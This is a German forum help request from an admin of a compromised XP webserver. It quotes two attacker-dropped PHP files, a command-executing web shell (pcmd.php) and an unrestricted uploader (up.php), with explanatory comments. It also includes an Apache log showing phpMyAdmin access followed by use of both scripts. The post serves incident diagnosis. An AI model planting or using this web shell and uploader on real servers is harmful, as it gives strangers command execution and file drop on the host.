ich habe einen XP Pro Rechner mit fester IP als Webserver laufen. ich weiß, alleine das ist eigentlich schon strafbar, aber es hat sich halt so ergeben.
um das teil abzusichern hab ich den antivir und die windows-eigene firewall laufen. alle unnötigen dienste sind deaktiviert und die "unsicheren user" sind gelöscht.
leider schleicht sich aber hier und da nochmal ein backdoor-programm ein und ich bin mir nicht so ganz im klaren, wie das vonstatten geht. bei meiner letzten trojaner- und backdoor-beseitigung bin ich darauf gestoßen, dass eine datei mit gefährlichem inhalt im htdocs-verzeichnis meines webservers liegt. des weiteren hatte ich mehrere gruselige dateien im ordner mysql/data.
der angreifer war wohl schon auf meinem rechner unterwegs, denn mittlerweile war schon ein neuer user auf der maschine angelegt :-/
verständlicherweise hab ich nicht gerade ein großes interesse daran, dass da weiter einer sein unwesen auf meinem rechner treibt, deshalb füge ich diesem eintrag mal den inhalt meines apache-logs an und zwei php-scripte, welche in meinem root-verzeichnis lagen.
es wäre nett, wenn mir einer einen tipp geben kann, wie ich die sicherheitslücke (sofern es denn eine ist) schließen kann, um solche aktivitäten in zukunft zu vermeiden.
pcmd.php
<? /*
 * Attacker-dropped web shell found in the web root (see the post above).
 * Takes the "-cmd" parameter from $_REQUEST (GET, POST or cookie), echoes it
 * back unescaped into the form's value attribute, and if it is non-empty
 * hands it to Shell_Exec() and prints the raw output inside <pre>.
 * There is no authentication or restriction of any kind: anyone who can
 * reach this URL runs commands with the privileges of the PHP/Apache process.
 * Evidence handling: keep a copy with timestamps, do not run it. The access
 * log on this page shows one GET and one POST to /pcmd.php from the same
 * address directly after the phpMyAdmin session; it is plausible, but not
 * proven by the log alone, that the file was written through phpMyAdmin
 * (note the read_dump.php POSTs as user "pma") -- confirm against the
 * MySQL general log / file timestamps.
 */ $cmd = $_REQUEST["-cmd"]; ?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? /* only the non-empty check guards the shell call */ if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>
up.php
<html><head><title>Upload</title></head><body><form action="up.php" method="post" enctype="multipart/form-data" name="img_form"><input name="file" type="file" size="39"><br><input type="submit" name="Submit" value="save"></form><? /*
 * Attacker-dropped unrestricted upload script (second file from the web root).
 * For any multipart POST carrying a "file" field it copy()s the uploaded temp
 * file to a path taken verbatim from the client-supplied original file name
 * ($_FILES["file"]["name"]). No authentication, no size/type/name checks;
 * the destination is relative, so it lands in the PHP process's current
 * working directory -- presumably the web root under mod_php, confirm.
 * Used for dropping further tools: the access log on this page shows one GET
 * and two POSTs to /up.php from the same address as the pcmd.php requests.
 * The lone "\" on the following line looks like a paste/line-wrap artifact
 * of the forum post rather than part of the original file.
 */ if(isset($_FILES["file"])) { $tempname = $_FILES["file"]["tmp_name"]; $name = $_FILES["file"]["name"];
\
copy("$tempname", "$name"); } ?></body></html>
apache log
131.234.65.27 - - [07/Jun/2005:14:06:54 +0200] "GET /phpmyadmin/ HTTP/1.1" 401 2485
131.234.65.27 - pma [07/Jun/2005:14:06:57 +0200] "GET /phpmyadmin/ HTTP/1.1" 200 2805
131.234.65.27 - pma [07/Jun/2005:14:06:57 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right HTTP/1.1" 200 10848
131.234.65.27 - pma [07/Jun/2005:14:06:59 +0200] "GET /phpmyadmin/queryframe.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 9038
131.234.65.27 - pma [07/Jun/2005:14:07:00 +0200] "GET /phpmyadmin/left.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 1934
131.234.65.27 - pma [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:07:00 +0200] "GET /phpmyadmin/main.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci HTTP/1.1" 200 58984
131.234.65.27 - - [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/themes/original/img/logo_left.png HTTP/1.1" 200 4424
131.234.65.27 - - [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/themes/original/img/b_selboard.png HTTP/1.1" 200 274
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/b_home.png HTTP/1.1" 200 370
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/s_loggoff.png HTTP/1.1" 200 262
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/spacer.png HTTP/1.1" 200 153
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/vertical_line.png HTTP/1.1" 200 83
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/logo_right.png HTTP/1.1" 200 5658
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/b_help.png HTTP/1.1" 200 229
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/b_newdb.png HTTP/1.1" 200 408
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/s_status.png HTTP/1.1" 200 313
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_process.png HTTP/1.1" 200 362
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_asci.png HTTP/1.1" 200 254
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_docs.png HTTP/1.1" 200 292
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_reload.png HTTP/1.1" 200 245
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_rights.png HTTP/1.1" 200 512
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_db.png HTTP/1.1" 200 285
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_export.png HTTP/1.1" 200 313
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_passwd.png HTTP/1.1" 200 505
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_lang.png HTTP/1.1" 200 422
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_info.png HTTP/1.1" 200 234
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_sqlhelp.png HTTP/1.1" 200 287
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_theme.png HTTP/1.1" 200 737
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/php_sym.png HTTP/1.1" 200 249
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_vars.png HTTP/1.1" 200 306
131.234.65.27 - pma [07/Jun/2005:14:07:21 +0200] "GET /phpmyadmin/phpinfo.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci HTTP/1.1" 200 45762
131.234.65.27 - pma [07/Jun/2005:14:07:22 +0200] "GET /phpmyadmin/phpinfo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 4644
131.234.65.27 - pma [07/Jun/2005:14:07:22 +0200] "GET /phpmyadmin/phpinfo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2146
131.234.65.27 - pma [07/Jun/2005:14:07:44 +0200] "GET /phpmyadmin/server_status.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci HTTP/1.1" 200 64732
131.234.65.27 - pma [07/Jun/2005:14:07:45 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - - [07/Jun/2005:14:07:46 +0200] "GET /phpmyadmin/themes/original/img/s_host.png HTTP/1.1" 200 316
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_db.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/vertical_line.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_status.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_vars.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_asci.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:48 +0200] "GET /phpmyadmin/themes/original/img/s_rights.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:48 +0200] "GET /phpmyadmin/themes/original/img/s_process.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:51 +0200] "GET /phpmyadmin/themes/original/img/b_export.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:02 +0200] "POST /phpmyadmin/left.php HTTP/1.1" 200 14937
131.234.65.27 - - [07/Jun/2005:14:08:02 +0200] "GET /phpmyadmin/themes/original/img/b_sbrowse.png HTTP/1.1" 200 197
131.234.65.27 - pma [07/Jun/2005:14:08:02 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:03 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:02 +0200] "GET /phpmyadmin/db_details_structure.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql HTTP/1.1" 200 113574
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/libraries/functions.js HTTP/1.1" 200 36324
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_props.png HTTP/1.1" 200 294
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_sql.png HTTP/1.1" 200 322
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_search.png HTTP/1.1" 200 605
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/bd_select.png HTTP/1.1" 200 524
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/bd_browse.png HTTP/1.1" 200 265
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_deltbl.png HTTP/1.1" 200 364
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_select.png HTTP/1.1" 200 540
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_empty.png HTTP/1.1" 200 298
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_print.png HTTP/1.1" 200 574
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/arrow_ltr.png HTTP/1.1" 200 277
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_tblanalyse.png HTTP/1.1" 200 296
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_newtbl.png HTTP/1.1" 200 409
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_comment.png HTTP/1.1" 200 552
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_edit.png HTTP/1.1" 200 451
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_insrow.png HTTP/1.1" 200 283
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_pdfdoc.png HTTP/1.1" 200 298
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/item_ltr.png HTTP/1.1" 200 173
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/bd_empty.png HTTP/1.1" 200 298
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_drop.png HTTP/1.1" 200 311
131.234.65.27 - - [07/Jun/2005:14:08:08 +0200] "GET /phpmyadmin/themes/original/img/b_browse.png HTTP/1.1" 200 265
131.234.65.27 - pma [07/Jun/2005:14:08:09 +0200] "GET /phpmyadmin/db_details.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&goto=db_details_structure.php&db_query_force=1 HTTP/1.1" 200 17063
131.234.65.27 - pma [07/Jun/2005:14:08:10 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - - [07/Jun/2005:14:08:10 +0200] "GET /phpmyadmin/themes/original/img/b_help.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - - [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/themes/original/img/logo_right.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/themes/original/img/b_newdb.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/left.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 1934
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/s_reload.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/s_passwd.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/b_info.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/s_lang.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:16 +0200] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 65169
131.234.65.27 - - [07/Jun/2005:14:08:19 +0200] "GET /phpmyadmin/themes/original/img/s_theme.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:19 +0200] "GET /phpmyadmin/themes/original/img/php_sym.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:19 +0200] "GET /phpmyadmin/queryframe.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 9038
131.234.65.27 - - [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/themes/original/img/logo_left.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/themes/original/img/b_selboard.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/themes/original/img/b_sqlhelp.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:22 +0200] "POST /phpmyadmin/left.php HTTP/1.1" 200 14937
131.234.65.27 - pma [07/Jun/2005:14:08:23 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:23 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:23 +0200] "GET /phpmyadmin/db_details_structure.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql HTTP/1.1" 200 113574
131.234.65.27 - pma [07/Jun/2005:14:08:27 +0200] "GET /phpmyadmin/db_details.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&goto=db_details_structure.php&db_query_force=1 HTTP/1.1" 200 17063
131.234.65.27 - pma [07/Jun/2005:14:08:28 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:30 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:31 +0200] "GET /phpmyadmin/left.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 1934
131.234.65.27 - pma [07/Jun/2005:14:08:31 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:30 +0200] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 65012
131.234.65.27 - pma [07/Jun/2005:14:08:33 +0200] "GET /phpmyadmin/queryframe.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 9038
131.234.65.27 - pma [07/Jun/2005:14:08:33 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - - [07/Jun/2005:14:08:37 +0200] "GET /pcmd.php HTTP/1.1" 200 273
131.234.65.27 - - [07/Jun/2005:14:08:39 +0200] "POST /pcmd.php HTTP/1.1" 200 1769
131.234.65.27 - - [07/Jun/2005:14:09:36 +0200] "GET /up.php HTTP/1.1" 200 378
131.234.65.27 - - [07/Jun/2005:14:09:51 +0200] "POST /up.php HTTP/1.1" 200 378
131.234.65.27 - - [07/Jun/2005:14:10:17 +0200] "POST /up.php HTTP/1.1" 200 378